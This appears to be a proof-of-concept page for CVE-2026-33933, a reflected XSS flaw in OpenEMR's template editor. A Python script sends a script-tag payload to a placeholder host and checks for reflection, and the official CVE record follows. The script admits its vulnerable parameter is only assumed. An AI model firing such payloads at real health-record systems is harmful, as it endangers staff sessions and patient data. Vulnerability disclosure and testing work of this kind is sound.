CVE-2026-33933

import requests # Target URL structure for the custom template editor target_url = "http://target-openemr.com/interface/main/custom_template.php" # Malicious JavaScript payload payload = "<script>alert('CVE-2026-33933 confirmed');</script>" # Parameters to inject (assuming a vulnerable parameter based on typical XSS patterns) params = { "template_id": payload } try: # Send request simulating a victim clicking the link response = requests.get(target_url, params=params, timeout=10) # Verify if the payload is reflected in the response without proper encoding if payload in response.text: print(f"[+] Vulnerability Confirmed!") print(f"[+] Exploit URL: {response.url}") else: print("[-] Payload not reflected or patched.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-33933", "sourceIdentifier": "[email protected]", "published": "2026-03-26T00:16:40.120", "lastModified": "2026-03-26T16:17:56.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Starting in version 7.0.2.1 and prior to version 8.0.0.3, a reflected cross-site scripting (XSS) vulnerability in the custom template editor allows an attacker to execute arbitrary JavaScript in an authenticated staff member's browser session by sending them a crafted URL. The attacker does not need an OpenEMR account. Version 8.0.0.3 patches the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación gratuita y de código abierto de registros de salud electrónicos y gestión de consultorios médicos. A partir de la versión 7.0.2.1 y antes de la versión 8.0.0.3, una vulnerabilidad de cross-site scripting (XSS) reflejado en el editor de plantillas personalizadas permite a un atacante ejecutar JavaScript arbitrario en la sesión del navegador de un miembro del personal autenticado enviándoles una URL manipulada. El atacante no necesita una cuenta de OpenEMR. La versión 8.0.0.3 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.2.1", "versionEndExcluding": "8.0.0.3", "matchCriteriaId": "37A001F6-4070-4BC4-8A5A-B4CCEA856E39"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/d5c8d49ef19983472b2d7db0dbebd2dac9d6a200", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/commit/de9b6eb0da574430e8223c014cf4a05b0adc29d8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/releases/tag/v8_0_0_3", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-9qh7-cfq4-j7c3", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-9qh7-cfq4-j7c3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}